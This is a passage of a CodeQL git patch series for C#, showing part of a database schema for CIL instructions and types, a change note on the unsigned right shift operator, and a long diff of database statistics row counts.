@cil_stelem_i | @cil_stelem_i1 | @cil_stelem_i2 | @cil_stelem_i4 | @cil_stelem_i8 | + @cil_stelem_r4 | @cil_stelem_r8; + +@cil_throw_any = @cil_throw | @cil_rethrow; + +#keyset[impl, index] +cil_instruction( + unique int id: @cil_instruction, + int opcode: int ref, + int index: int ref, + int impl: @cil_method_implementation ref); + +cil_jump( + unique int instruction: @cil_jump ref, + int target: @cil_instruction ref); + +cil_access( + unique int instruction: @cil_instruction ref, + int target: @cil_accessible ref); + +cil_value( + unique int instruction: @cil_literal ref, + string value: string ref); + +#keyset[instruction, index] +cil_switch( + int instruction: @cil_switch ref, + int index: int ref, + int target: @cil_instruction ref); + +cil_instruction_location( + unique int id: @cil_instruction ref, + int loc: @location ref); + +cil_type_location( + int id: @cil_type ref, + int loc: @location ref); + +cil_method_location( + int id: @cil_method ref, + int loc: @location ref); + +@cil_namespace = @namespace; + +@cil_type_container = @cil_type | @cil_namespace | @cil_method; + +case @cil_type.kind of + 0 = @cil_valueorreftype +| 1 = @cil_typeparameter +| 2 = @cil_array_type +| 3 = @cil_pointer_type +| 4 = @cil_function_pointer_type +; + +cil_type( + unique int id: @cil_type, + string name: string ref, + int kind: int ref, + int parent: @cil_type_container ref, + int sourceDecl: @cil_type ref); + +cil_pointer_type( + unique int id: @cil_pointer_type ref, + int pointee: @cil_type ref); + +cil_array_type( + unique int id: @cil_array_type ref, + int element_type: @cil_type ref, + int rank: int ref); + +cil_function_pointer_return_type( + unique int id: @cil_function_pointer_type ref, + int return_type: @cil_type ref); + +cil_method( + unique int id: @cil_method, + string name: string ref, + int parent: @cil_type ref, + int return_type: @cil_type ref); + +cil_method_source_declaration( + unique int method: @cil_method ref, + int source: @cil_method ref); + +cil_method_implementation( + unique int id: @cil_method_implementation, + int method: @cil_method ref, + int location: @assembly ref); + +cil_implements( + int id: @cil_method ref, + int decl: @cil_method ref); + +#keyset[parent, name] +cil_field( + unique int id: @cil_field, + int parent: @cil_type ref, + string name: string ref, + int field_type: @cil_type ref); + +@cil_element = @cil_instruction | @cil_declaration | @cil_handler | @cil_attribute | @cil_namespace; +@cil_named_element = @cil_declaration | @cil_namespace; +@cil_declaration = @cil_variable | @cil_method | @cil_type | @cil_member; +@cil_accessible = @cil_declaration; +@cil_variable = @cil_field | @cil_stack_variable; +@cil_stack_variable = @cil_local_variable | @cil_parameter; +@cil_member = @cil_method | @cil_type | @cil_field | @cil_property | @cil_event; +@cil_custom_modifier_receiver = @cil_method | @cil_property | @cil_parameter | @cil_field | @cil_function_pointer_type; +@cil_parameterizable = @cil_method | @cil_function_pointer_type; +@cil_has_type_annotation = @cil_stack_variable | @cil_property | @cil_method | @cil_function_pointer_type; + +#keyset[parameterizable, index] +cil_parameter( + unique int id: @cil_parameter, + int parameterizable: @cil_parameterizable ref, + int index: int ref, + int param_type: @cil_type ref); + +cil_parameter_in(unique int id: @cil_parameter ref); +cil_parameter_out(unique int id: @cil_parameter ref); + +cil_setter(unique int prop: @cil_property ref, + int method: @cil_method ref); + +#keyset[id, modifier] +cil_custom_modifiers( + int id: @cil_custom_modifier_receiver ref, + int modifier: @cil_type ref, + int kind: int ref); // modreq: 1, modopt: 0 + +cil_type_annotation( + int id: @cil_has_type_annotation ref, + int annotation: int ref); + +cil_getter(unique int prop: @cil_property ref, + int method: @cil_method ref); + +cil_adder(unique int event: @cil_event ref, + int method: @cil_method ref); + +cil_remover(unique int event: @cil_event ref, int method: @cil_method ref); + +cil_raiser(unique int event: @cil_event ref, int method: @cil_method ref); + +cil_property( + unique int id: @cil_property, + int parent: @cil_type ref, + string name: string ref, + int property_type: @cil_type ref); + +#keyset[parent, name] +cil_event(unique int id: @cil_event, + int parent: @cil_type ref, + string name: string ref, + int event_type: @cil_type ref); + +#keyset[impl, index] +cil_local_variable( + unique int id: @cil_local_variable, + int impl: @cil_method_implementation ref, + int index: int ref, + int var_type: @cil_type ref); + +cil_function_pointer_calling_conventions( + int id: @cil_function_pointer_type ref, + int kind: int ref); + +// CIL handlers (exception handlers etc). + +case @cil_handler.kind of + 0 = @cil_catch_handler +| 1 = @cil_filter_handler +| 2 = @cil_finally_handler +| 4 = @cil_fault_handler +; + +#keyset[impl, index] +cil_handler( + unique int id: @cil_handler, + int impl: @cil_method_implementation ref, + int index: int ref, + int kind: int ref, + int try_start: @cil_instruction ref, + int try_end: @cil_instruction ref, + int handler_start: @cil_instruction ref); + +cil_handler_filter( + unique int id: @cil_handler ref, + int filter_start: @cil_instruction ref); + +cil_handler_type( + unique int id: @cil_handler ref, + int catch_type: @cil_type ref); + +@cil_controlflow_node = @cil_entry_point | @cil_instruction; + +@cil_entry_point = @cil_method_implementation | @cil_handler; + +@cil_dataflow_node = @cil_instruction | @cil_variable | @cil_method; + +cil_method_stack_size( + unique int method: @cil_method_implementation ref, + int size: int ref); + +// CIL modifiers + +cil_public(int id: @cil_member ref); +cil_private(int id: @cil_member ref); +cil_protected(int id: @cil_member ref); +cil_internal(int id: @cil_member ref); +cil_static(int id: @cil_member ref); +cil_sealed(int id: @cil_member ref); +cil_virtual(int id: @cil_method ref); +cil_abstract(int id: @cil_member ref); +cil_class(int id: @cil_type ref); +cil_interface(int id: @cil_type ref); +cil_security(int id: @cil_member ref); +cil_requiresecobject(int id: @cil_method ref); +cil_specialname(int id: @cil_method ref); +cil_newslot(int id: @cil_method ref); + +cil_base_class(unique int id: @cil_type ref, int base: @cil_type ref); +cil_base_interface(int id: @cil_type ref, int base: @cil_type ref); +cil_enum_underlying_type(unique int id: @cil_type ref, int underlying: @cil_type ref); + +#keyset[unbound, index] +cil_type_parameter( + int unbound: @cil_member ref, + int index: int ref, + int param: @cil_typeparameter ref); + +#keyset[bound, index] +cil_type_argument( + int bound: @cil_member ref, + int index: int ref, + int t: @cil_type ref); + +// CIL type parameter constraints + +cil_typeparam_covariant(int tp: @cil_typeparameter ref); +cil_typeparam_contravariant(int tp: @cil_typeparameter ref); +cil_typeparam_class(int tp: @cil_typeparameter ref); +cil_typeparam_struct(int tp: @cil_typeparameter ref); +cil_typeparam_new(int tp: @cil_typeparameter ref); +cil_typeparam_constraint(int tp: @cil_typeparameter ref, int supertype: @cil_type ref); + +// CIL attributes + +cil_attribute( + unique int attributeid: @cil_attribute, + int element: @cil_declaration ref, + int constructor: @cil_method ref); + +#keyset[attribute_id, param] +cil_attribute_named_argument( + int attribute_id: @cil_attribute ref, + string param: string ref, + string value: string ref); + +#keyset[attribute_id, index] +cil_attribute_positional_argument( + int attribute_id: @cil_attribute ref, + int index: int ref, + string value: string ref); + + +// Common .Net data model covering both C# and CIL + +// Common elements +@dotnet_element = @element | @cil_element; +@dotnet_named_element = @named_element | @cil_named_element; +@dotnet_callable = @callable | @cil_method; +@dotnet_variable = @variable | @cil_variable; +@dotnet_field = @field | @cil_field; +@dotnet_parameter = @parameter | @cil_parameter; +@dotnet_declaration = @declaration | @cil_declaration; +@dotnet_member = @member | @cil_member; +@dotnet_event = @event | @cil_event; +@dotnet_property = @property | @cil_property | @indexer; +@dotnet_parameterizable = @parameterizable | @cil_parameterizable; + +// Common types +@dotnet_type = @type | @cil_type; +@dotnet_call = @call | @cil_call_any; +@dotnet_throw = @throw_element | @cil_throw_any; +@dotnet_valueorreftype = @cil_valueorreftype | @value_or_ref_type | @cil_array_type | @void_type; +@dotnet_typeparameter = @type_parameter | @cil_typeparameter; +@dotnet_array_type = @array_type | @cil_array_type; +@dotnet_pointer_type = @pointer_type | @cil_pointer_type; +@dotnet_type_parameter = @type_parameter | @cil_typeparameter; +@dotnet_generic = @dotnet_valueorreftype | @dotnet_callable; + +// Attributes +@dotnet_attribute = @attribute | @cil_attribute; + +// Expressions +@dotnet_expr = @expr | @cil_expr; + +// Literals +@dotnet_literal = @literal_expr | @cil_literal; +@dotnet_string_literal = @string_literal_expr | @cil_ldstr; +@dotnet_int_literal = @integer_literal_expr | @cil_ldc_i; +@dotnet_float_literal = @float_literal_expr | @cil_ldc_r; +@dotnet_null_literal = @null_literal_expr | @cil_ldnull; + +@metadata_entity = @cil_method | @cil_type | @cil_field | @cil_property | @field | @property | + @callable | @value_or_ref_type | @void_type; + +#keyset[entity, location] +metadata_handle(int entity : @metadata_entity ref, int location: @assembly ref, int handle: int ref) diff --git a/csharp/ql/lib/upgrades/83aca6b3e4fa38dd2b97b9b51dfc199a2ba9c7f2/upgrade.properties b/csharp/ql/lib/upgrades/83aca6b3e4fa38dd2b97b9b51dfc199a2ba9c7f2/upgrade.properties new file mode 100644 index 00000000000..25d7416df1c --- /dev/null +++ b/csharp/ql/lib/upgrades/83aca6b3e4fa38dd2b97b9b51dfc199a2ba9c7f2/upgrade.properties @@ -0,0 +1,2 @@ +description: Add unsigned right shift and unsigned right shift assignment expression kinds. +compatibility: backwards From 1384aa669b34c306b59ba20265ba7736828cec17 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Wed, 11 Jan 2023 16:49:36 +0100 Subject: [PATCH 237/381] C#: Add change note. --- csharp/ql/lib/change-notes/2023-01-11-unsigned-right-shift.md | 4 ++++ 1 file changed, 4 insertions(+) create mode 100644 csharp/ql/lib/change-notes/2023-01-11-unsigned-right-shift.md diff --git a/csharp/ql/lib/change-notes/2023-01-11-unsigned-right-shift.md b/csharp/ql/lib/change-notes/2023-01-11-unsigned-right-shift.md new file mode 100644 index 00000000000..6c644b8b2fb --- /dev/null +++ b/csharp/ql/lib/change-notes/2023-01-11-unsigned-right-shift.md @@ -0,0 +1,4 @@ +--- +category: minorAnalysis +--- +* C# 11: Added support for the unsigned right shift `>>>` and unsigned right shift assignment `>>>=` operators. \ No newline at end of file From c1c0ff4308f5f748bf65cc01e04f1d0230dd1124 Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Thu, 12 Jan 2023 10:38:14 +0100 Subject: [PATCH 238/381] C#: Update database stats. --- .../ql/lib/semmlecode.csharp.dbscheme.stats | 4346 ++++++++--------- 1 file changed, 2173 insertions(+), 2173 deletions(-) diff --git a/csharp/ql/lib/semmlecode.csharp.dbscheme.stats b/csharp/ql/lib/semmlecode.csharp.dbscheme.stats index 8204b7b9aaa..b7c93de7353 100644 --- a/csharp/ql/lib/semmlecode.csharp.dbscheme.stats +++ b/csharp/ql/lib/semmlecode.csharp.dbscheme.stats @@ -17,12 +17,12 @@ 0 - @assembly - 14676 + @file + 106540 - @file - 106541 + @assembly + 14676 @folder @@ -30,35 +30,31 @@ @namespace - 500337 + 500332 @namespace_declaration - 42810 + 42809 @using_namespace_directive - 223779 + 223777 @using_static_directive 3484 - - @directive_if - 16750 - @directive_elif 275 - @directive_else - 5439 + @directive_if + 16749 - @location_default - 137912010 + @directive_else + 5439 @directive_endif @@ -92,6 +88,10 @@ @directive_undefine 55 + + @location_default + 137911541 + @directive_define 66 @@ -106,7 +106,7 @@ @typeref - 4815264 + 4815219 @bool_type @@ -162,23 +162,23 @@ @enum_type - 204056 + 204054 @struct_type - 1036578 + 1036568 @class_type - 5157996 + 5157948 @interface_type - 3246154 + 3246124 @delegate_type - 1214025 + 1214014 @null_type @@ -186,7 +186,7 @@ @type_parameter - 991372 + 991363 @pointer_type @@ -198,7 +198,7 @@ @array_type - 116793 + 116792 @void_type @@ -222,7 +222,7 @@ @tuple_type - 37858 + 37857 @function_pointer_type @@ -232,26 +232,26 @@ @uint_ptr_type 0 - - @type_mention - 2667838 - @attribute_default - 14361364 + 14361230 @attribute_return - 224363 + 224361 @attribute_assembly - 52426 + 52425 @attribute_module 53 + + @type_mention + 2667808 + @oblivious 21291 @@ -266,7 +266,7 @@ @type_parameter_constraints - 991372 + 991363 @modifier @@ -274,19 +274,19 @@ @property - 6642412 + 6642350 @indexer - 105719 + 105718 @getter - 6738210 + 6738147 @setter - 1177149 + 1177138 @event @@ -302,15 +302,15 @@ @operator - 629721 + 629715 @method - 20454980 + 20454789 @constructor - 5991233 + 5991176 @destructor @@ -322,15 +322,15 @@ @addressable_field - 11102837 + 11102733 @constant - 3873680 + 3873643 @addressable_local_variable - 497829 + 497825 @local_constant @@ -342,19 +342,19 @@ @parameter - 37386455 + 37386105 @block_stmt - 643009 + 643003 @expr_stmt - 698450 + 698444 @if_stmt - 299700 + 299697 @switch_stmt @@ -366,7 +366,7 @@ @do_stmt - 1916 + 1915 @for_stmt @@ -374,15 +374,15 @@ @foreach_stmt - 26826 + 26825 @break_stmt - 106776 + 106775 @continue_stmt - 8596 + 8595 @goto_stmt @@ -394,11 +394,11 @@ @throw_stmt - 157116 + 157106 @return_stmt - 301790 + 301787 @yield_stmt @@ -426,7 +426,7 @@ @var_decl_stmt - 449250 + 449246 @const_decl_stmt @@ -446,7 +446,7 @@ @case_stmt - 118515 + 118513 @goto_default_stmt @@ -466,19 +466,19 @@ @using_decl_stmt - 11564 + 11563 @bool_literal_expr - 472283 + 472278 @char_literal_expr - 61271 + 61270 @int_literal_expr - 3354291 + 3354259 @long_literal_expr @@ -490,27 +490,27 @@ @ulong_literal_expr - 3300 + 3299 @float_literal_expr - 109488 + 109487 @double_literal_expr - 54800 + 54799 @string_literal_expr - 2171269 + 2171248 @null_literal_expr - 215382 + 215366 @this_access_expr - 857625 + 857617 @base_access_expr @@ -518,19 +518,19 @@ @local_variable_access_expr - 1451844 + 1451830 @parameter_access_expr - 841262 + 841254 @field_access_expr - 1097227 + 1097217 @property_access_expr - 1242991 + 1242979 @method_access_expr @@ -550,15 +550,15 @@ @type_access_expr - 1243003 + 1242991 @typeof_expr - 597670 + 597664 @method_invocation_expr - 1078551 + 1078542 @delegate_invocation_expr @@ -566,15 +566,15 @@ @operator_invocation_expr - 596656 + 596650 @cast_expr - 781499 + 781491 @object_creation_expr - 202927 + 202926 @explicit_delegate_creation_expr @@ -586,11 +586,11 @@ @array_creation_expr - 565044 + 565039 @default_expr - 669657 + 669651 @minus_expr @@ -598,7 +598,7 @@ @log_not_expr - 60763 + 60762 @post_incr_expr @@ -618,7 +618,7 @@ @mul_expr - 9154 + 9153 @div_expr @@ -630,11 +630,11 @@ @add_expr - 72534 + 72533 @sub_expr - 25994 + 25993 @lshift_expr @@ -644,17 +644,13 @@ @rshift_expr 5127 - - @urshift_expr - 0 - @lt_expr - 34251 + 34250 @gt_expr - 20968 + 20967 @le_expr @@ -662,15 +658,15 @@ @ge_expr - 12159 + 12158 @eq_expr - 135300 + 135298 @ne_expr - 117244 + 117243 @bit_and_expr @@ -686,7 +682,7 @@ @log_and_expr - 51646 + 51645 @log_or_expr @@ -694,7 +690,7 @@ @is_expr - 19997 + 19994 @as_expr @@ -706,11 +702,11 @@ @conditional_expr - 34750 + 34749 @simple_assign_expr - 1223633 + 1223622 @assign_add_expr @@ -730,7 +726,7 @@ @object_init_expr - 163090 + 163088 @collection_init_expr @@ -738,7 +734,7 @@ @array_init_expr - 564188 + 564183 @checked_expr @@ -750,7 +746,7 @@ @constructor_init_expr - 42947 + 42945 @add_event_expr @@ -762,11 +758,11 @@ @local_var_decl_expr - 499277 + 499273 @lambda_expr - 200792 + 200791 @anonymous_method_expr @@ -782,7 +778,7 @@ @nameof_expr - 50715 + 50714 @interpolated_string_expr @@ -798,15 +794,15 @@ @discard_expr - 30087 + 30086 @define_symbol_expr - 32513 + 32512 @decimal_literal_expr - 157044 + 157042 @plus_expr @@ -840,10 +836,6 @@ @assign_rshift_expr 455 - - @assign_urshift_expr - 0 - @par_expr 0 @@ -894,11 +886,11 @@ @recursive_pattern_expr - 3150 + 3146 @property_pattern_expr - 2543 + 2533 @positional_pattern_expr @@ -906,7 +898,7 @@ @switch_case_expr - 660643 + 660636 @assign_coalesce_expr @@ -914,7 +906,7 @@ @suppress_nullable_warning_expr - 25801 + 25799 @namespace_access_expr @@ -938,7 +930,7 @@ @not_pattern_expr - 2910 + 2909 @and_pattern_expr @@ -946,7 +938,7 @@ @or_pattern_expr - 2477 + 2476 @function_pointer_invocation_expr @@ -964,17 +956,25 @@ @slice_pattern_expr 18 + + @urshift_expr + 50 + + + @assign_urshift_expr + 2 + @xmldtd 58 @xmlelement - 60596893 + 60596686 @xmlattribute - 41517960 + 41517819 @xmlnamespace @@ -986,23 +986,23 @@ @xmlcharacters - 45379511 + 45379357 @singlelinecomment - 673827 + 673821 @xmldoccomment - 1226196 + 1226185 @multilinecomment - 82948 + 82947 @commentblock - 374970 + 374967 @asp_close_tag @@ -1030,7 +1030,7 @@ @asp_quoted_string - 47186 + 47185 @asp_text @@ -1042,15 +1042,15 @@ @cil_valueorreftype - 10427087 + 10426990 @cil_typeparameter - 1773609 + 1773592 @cil_array_type - 181790 + 181788 @cil_pointer_type @@ -1058,135 +1058,139 @@ @cil_function_pointer_type - 39912 + 39911 + + + @cil_method + 39373409 @cil_nop - 1327129 + 1327046 @cil_ldarg_0 - 53581819 + 53581318 @cil_ldarg_1 - 20969699 + 20969503 @cil_ldarg_2 - 7471514 + 7471444 @cil_ldarg_3 - 3234755 + 3234725 @cil_ldloc_0 - 17598601 + 17598436 @cil_ldloc_1 - 9495219 + 9495130 @cil_ldloc_2 - 6739302 + 6739239 @cil_ldloc_3 - 4230971 + 4230931 @cil_stloc_0 - 8735189 + 8735107 @cil_stloc_1 - 5003935 + 5003888 @cil_stloc_2 - 3618151 + 3618117 @cil_stloc_3 - 2480277 + 2480254 @cil_ldarg_s - 3414862 + 3414830 @cil_ldarga_s - 1248318 + 1248307 @cil_starg_s - 270382 + 270379 @cil_ldloc_s - 14457162 + 14457027 @cil_ldloca_s - 9786184 + 9786093 @cil_stloc_s - 9038705 + 9038620 @cil_ldnull - 5794381 + 5794327 @cil_ldc_i4_m1 - 871537 + 871529 @cil_ldc_i4_0 - 10862959 + 10862858 @cil_ldc_i4_1 - 8606701 + 8606621 @cil_ldc_i4_2 - 1948578 + 1948560 @cil_ldc_i4_3 - 1073526 + 1073516 @cil_ldc_i4_4 - 985880 + 985870 @cil_ldc_i4_5 - 578416 + 578411 @cil_ldc_i4_6 - 334080 + 334076 @cil_ldc_i4_7 - 296812 + 296809 @cil_ldc_i4_8 - 444583 + 444579 @cil_ldc_i4_s - 5378885 + 5378835 @cil_ldc_i4 - 2836653 + 2836626 @cil_ldc_i8 @@ -1194,23 +1198,23 @@ @cil_ldc_r4 - 31066 + 31065 @cil_ldc_r8 - 238341 + 238339 @cil_dup - 9272617 + 9272530 @cil_pop - 3880176 + 3880140 @cil_call - 48855176 + 48854719 @cil_calli @@ -1218,43 +1222,43 @@ @cil_ret - 31661234 + 31660937 @cil_br_s - 5776958 + 5776904 @cil_brfalse_s - 10010144 + 10010051 @cil_brtrue_s - 9349219 + 9349132 @cil_beq_s - 1588452 + 1588437 @cil_bge_s - 302364 + 302361 @cil_bgt_s - 237898 + 237896 @cil_ble_s - 342112 + 342109 @cil_blt_s - 581015 + 581009 @cil_bne_un_s - 2310181 + 2310159 @cil_bge_un_s @@ -1262,11 +1266,11 @@ @cil_bgt_un_s - 101083 + 101082 @cil_ble_un_s - 98691 + 98690 @cil_blt_un_s @@ -1274,23 +1278,23 @@ @cil_br - 1432176 + 1432163 @cil_brfalse - 953957 + 953948 @cil_brtrue - 803794 + 803786 @cil_beq - 420014 + 420010 @cil_bge - 34905 + 34904 @cil_bgt @@ -1302,11 +1306,11 @@ @cil_blt - 95206 + 95205 @cil_bne_un - 210730 + 210728 @cil_bge_un @@ -1326,7 +1330,7 @@ @cil_switch - 272685 + 272683 @cil_ldind_i1 @@ -1334,7 +1338,7 @@ @cil_ldind_u1 - 90068 + 90067 @cil_ldind_u2 @@ -1342,7 +1346,7 @@ @cil_ldind_i4 - 219353 + 219351 @cil_ldind_u4 @@ -1362,15 +1366,15 @@ @cil_ldind_ref - 190974 + 190972 @cil_stind_ref - 325516 + 325513 @cil_stind_i1 - 144847 + 144846 @cil_stind_i2 @@ -1378,7 +1382,7 @@ @cil_stind_i4 - 441482 + 441478 @cil_stind_i8 @@ -1394,19 +1398,19 @@ @cil_add - 2691805 + 2691780 @cil_sub - 1007112 + 1007103 @cil_mul - 426481 + 426477 @cil_div - 85048 + 85047 @cil_div_un @@ -1422,31 +1426,31 @@ @cil_and - 506036 + 506032 @cil_or - 225791 + 225789 @cil_xor - 192185 + 192183 @cil_shl - 118122 + 118121 @cil_shr - 60626 + 60625 @cil_shr_un - 114815 + 114814 @cil_neg - 29501 + 29500 @cil_not @@ -1462,11 +1466,11 @@ @cil_conv_i4 - 534002 + 533997 @cil_conv_i8 - 309038 + 309035 @cil_conv_r4 @@ -1482,11 +1486,11 @@ @cil_conv_u8 - 142987 + 142985 @cil_callvirt - 41217611 + 41217225 @cil_cpobj @@ -1494,23 +1498,23 @@ @cil_ldobj - 163865 + 163863 @cil_ldstr - 11254978 + 11254873 @cil_newobj - 12728409 + 12728290 @cil_castclass - 1803967 + 1803950 @cil_isinst - 2744724 + 2744698 @cil_conv_r_un @@ -1522,23 +1526,23 @@ @cil_throw - 1827943 + 1827881 @cil_ldfld - 23008966 + 23008751 @cil_ldflda - 1951443 + 1951424 @cil_stfld - 11363976 + 11363870 @cil_ldsfld - 10513996 + 10513898 @cil_ldsflda @@ -1546,7 +1550,7 @@ @cil_stsfld - 2599167 + 2599143 @cil_stobj @@ -1554,19 +1558,19 @@ @cil_box - 1419832 + 1419819 @cil_newarr - 1603690 + 1603675 @cil_ldlen - 570295 + 570290 @cil_ldelema - 714434 + 714427 @cil_ldelem_i1 @@ -1574,7 +1578,7 @@ @cil_ldelem_u1 - 104863 + 104862 @cil_ldelem_i2 @@ -1586,15 +1590,15 @@ @cil_ldelem_i4 - 158254 + 158253 @cil_ldelem_u4 - 130732 + 130730 @cil_ldelem_i8 - 64583 + 64582 @cil_ldelem_i @@ -1610,7 +1614,7 @@ @cil_ldelem_ref - 344799 + 344796 @cil_stelem_i @@ -1618,7 +1622,7 @@ @cil_stelem_i1 - 75244 + 75243 @cil_stelem_i2 @@ -1626,11 +1630,11 @@ @cil_stelem_i4 - 173108 + 173106 @cil_stelem_i8 - 31007 + 31006 @cil_stelem_r8 @@ -1638,19 +1642,19 @@ @cil_stelem_ref - 4221551 + 4221511 @cil_ldelem - 35909 + 35908 @cil_stelem - 208190 + 208188 @cil_unbox_any - 227651 + 227649 @cil_conv_ovf_u1 @@ -1666,7 +1670,7 @@ @cil_ldtoken - 1020371 + 1020362 @cil_conv_u2 @@ -1674,11 +1678,11 @@ @cil_conv_u1 - 238253 + 238250 @cil_conv_i - 34285 + 34284 @cil_conv_ovf_i @@ -1698,15 +1702,15 @@ @cil_endfinally - 1967891 + 1967873 @cil_leave - 692729 + 692723 @cil_leave_s - 3134203 + 3134174 @cil_stind_i @@ -1714,11 +1718,11 @@ @cil_conv_u - 114135 + 114134 @cil_ceq - 930037 + 930028 @cil_cgt @@ -1726,11 +1730,11 @@ @cil_cgt_un - 355253 + 355250 @cil_clt - 75775 + 75774 @cil_clt_un @@ -1738,7 +1742,7 @@ @cil_ldftn - 2883016 + 2882989 @cil_ldvirtftn @@ -1770,15 +1774,15 @@ @cil_volatile - 55222 + 55221 @cil_initobj - 950709 + 950700 @cil_constrained - 758376 + 758368 @cil_cpblk @@ -1790,7 +1794,7 @@ @cil_rethrow - 72025 + 72024 @cil_sizeof @@ -1922,7 +1926,7 @@ @cil_ldloca - 78758 + 78757 @cil_tail @@ -1932,37 +1936,33 @@ @cil_refanytype 13 - - @cil_method - 39373777 - @cil_method_implementation - 27073001 + 27072747 @cil_field - 15899467 + 15899318 @cil_parameter - 75119038 - - - @cil_property - 6002749 + 75118336 @cil_event - 70696 + 70695 + + + @cil_property + 6002693 @cil_local_variable - 23026507 + 23026292 @cil_catch_handler - 400819 + 400815 @cil_filter_handler @@ -1970,15 +1970,15 @@ @cil_finally_handler - 1662456 + 1662440 @cil_fault_handler - 305435 + 305432 @cil_attribute - 5874527 + 5874473 @@ -2328,7 +2328,7 @@ compilation_compiling_files - 49881 + 49880 id @@ -2648,7 +2648,7 @@ 1 2 - 49836 + 49835 2 @@ -2669,7 +2669,7 @@ 1 2 - 49836 + 49835 2 @@ -2684,7 +2684,7 @@ compilation_referencing_files - 719519 + 719512 id @@ -2918,57 +2918,62 @@ 1 5 - 630 + 574 5 6 - 1159 + 1148 6 7 - 900 + 957 7 - 22 + 21 + 540 + + + 21 + 27 574 - 22 - 28 - 574 + 27 + 32 + 540 - 28 - 35 - 517 - - - 35 + 32 42 529 - 42 - 58 + 43 + 59 551 - 58 - 67 - 608 + 59 + 66 + 495 - 67 - 70 + 66 + 69 + 506 + + + 69 + 73 585 - 70 - 77 - 416 + 73 + 82 + 45 @@ -3045,62 +3050,62 @@ 2 5 - 585 + 562 5 6 - 630 + 495 6 7 - 641 + 788 7 - 10 + 9 + 596 + + + 9 + 19 675 - 10 - 20 - 686 - - - 20 - 28 - 675 - - - 28 - 35 - 619 - - - 35 - 51 + 19 + 25 574 - 51 - 68 - 439 + 25 + 32 + 596 - 68 - 70 - 484 + 32 + 38 + 608 - 70 + 38 + 67 + 517 + + + 67 + 69 + 517 + + + 69 72 - 574 + 630 72 - 78 - 304 + 77 + 326 @@ -3126,7 +3131,7 @@ seconds - 11226 + 11530 @@ -3172,12 +3177,12 @@ 6 7 - 11 + 22 7 8 - 2206 + 2195 @@ -3223,8 +3228,8 @@ 12 - 997 - 998 + 1024 + 1025 11 @@ -3271,19 +3276,24 @@ 12 - 138 - 139 + 143 + 144 11 - 144 - 145 + 146 + 147 11 - 152 - 153 - 22 + 155 + 156 + 11 + + + 157 + 158 + 11 197 @@ -3304,7 +3314,7 @@ 1 2 - 9007 + 9345 2 @@ -3314,12 +3324,12 @@ 3 5 - 945 + 1035 5 - 10 - 247 + 8 + 123 @@ -3335,7 +3345,7 @@ 1 2 - 11226 + 11530 @@ -3351,17 +3361,17 @@ 1 2 - 9570 + 9874 2 3 - 1328 + 1429 3 5 - 326 + 225 @@ -4420,7 +4430,7 @@ 1 2 - 31693 + 31692 2 @@ -4489,7 +4499,7 @@ 1 2 - 31693 + 31692 2 @@ -4547,7 +4557,7 @@ 1 2 - 40646 + 40645 2 @@ -4568,7 +4578,7 @@ 1 2 - 40646 + 40645 2 @@ -4589,7 +4599,7 @@ 1 2 - 40646 + 40645 2 @@ -5365,7 +5375,7 @@     cpu_seconds - 1936 + 2060 elapsed_seconds @@ -5415,17 +5425,12 @@ 1 2 - 1666 + 1925 2 - 3 - 258 - - - 3 4 - 11 + 135 @@ -5441,17 +5446,12 @@ 1 2 - 1666 + 1925 2 - 3 - 258 - - - 3 4 - 11 + 135 @@ -5696,19 +5696,19 @@ locations_default - 137912010 + 137911541 id - 137912010 + 137911541 file - 73412 + 73411 beginLine - 328702 + 328701 beginColumn @@ -5716,7 +5716,7 @@ endLine - 331303 + 331302 endColumn @@ -5734,7 +5734,7 @@ 1 2 - 137912010 + 137911541 @@ -5750,7 +5750,7 @@ 1 2 - 137912010 + 137911541 @@ -5766,7 +5766,7 @@ 1 2 - 137912010 + 137911541 @@ -5782,7 +5782,7 @@ 1 2 - 137912010 + 137911541 @@ -5798,7 +5798,7 @@ 1 2 - 137912010 + 137911541 @@ -5971,7 +5971,7 @@ 1 6 - 5045 + 5044 6 @@ -6107,7 +6107,7 @@ 2417 135652 - 5197 + 5196 @@ -6204,7 +6204,7 @@ 4 5 - 21425 + 21424 5 @@ -6528,7 +6528,7 @@ 57 78 - 24880 + 24879 78 @@ -6961,7 +6961,7 @@ 2 3 - 76464 + 76463 3 @@ -7159,7 +7159,7 @@ 1 2 - 10090 + 10089 2 @@ -7353,15 +7353,15 @@ locations_mapped - 135223 + 135221 id - 135223 + 135221 mapped_to - 83194 + 83193 @@ -7375,7 +7375,7 @@ 1 2 - 135223 + 135221 @@ -7391,7 +7391,7 @@ 1 2 - 31212 + 31211 2 @@ -7411,11 +7411,11 @@ numlines - 60897147 + 60896940 element_id - 60897038 + 60896831 num_lines @@ -7441,7 +7441,7 @@ 1 2 - 60896930 + 60896723 2 @@ -7462,7 +7462,7 @@ 1 2 - 60896932 + 60896725 2 @@ -7483,7 +7483,7 @@ 1 2 - 60897026 + 60896819 2 @@ -8084,7 +8084,7 @@ 1 2 - 14588 + 14587 3 @@ -8105,7 +8105,7 @@ 1 2 - 14588 + 14587 3 @@ -8158,7 +8158,7 @@ 1 2 - 14588 + 14587 3 @@ -8179,7 +8179,7 @@ 1 2 - 14588 + 14587 3 @@ -8390,15 +8390,15 @@ files - 106541 + 106540 id - 106541 + 106540 name - 106541 + 106540 @@ -8412,7 +8412,7 @@ 1 2 - 106541 + 106540 @@ -8428,7 +8428,7 @@ 1 2 - 106541 + 106540 @@ -8486,7 +8486,7 @@ containerparent - 143755 + 143753 parent @@ -8494,7 +8494,7 @@ child - 143755 + 143753 @@ -8554,7 +8554,7 @@ 1 2 - 143755 + 143753 @@ -8612,15 +8612,15 @@ namespaces - 500337 + 500332 id - 500337 + 500332 name - 86288 + 86287 @@ -8634,7 +8634,7 @@ 1 2 - 500337 + 500332 @@ -8655,7 +8655,7 @@ 2 3 - 52830 + 52829 3 @@ -8700,11 +8700,11 @@ namespace_declarations - 42810 + 42809 id - 42810 + 42809 namespace_id @@ -8722,7 +8722,7 @@ 1 2 - 42810 + 42809 @@ -8783,15 +8783,15 @@ namespace_declaration_location - 42810 + 42809 id - 42810 + 42809 loc - 42810 + 42809 @@ -8805,7 +8805,7 @@ 1 2 - 42810 + 42809 @@ -8821,7 +8821,7 @@ 1 2 - 42810 + 42809 @@ -8831,15 +8831,15 @@ parent_namespace - 9856437 + 9856345 child_id - 9856437 + 9856345 namespace_id - 314826 + 314823 @@ -8853,7 +8853,7 @@ 1 2 - 9856437 + 9856345 @@ -8869,12 +8869,12 @@ 1 2 - 81977 + 81976 2 3 - 44857 + 44856 3 @@ -8884,7 +8884,7 @@ 4 5 - 21321 + 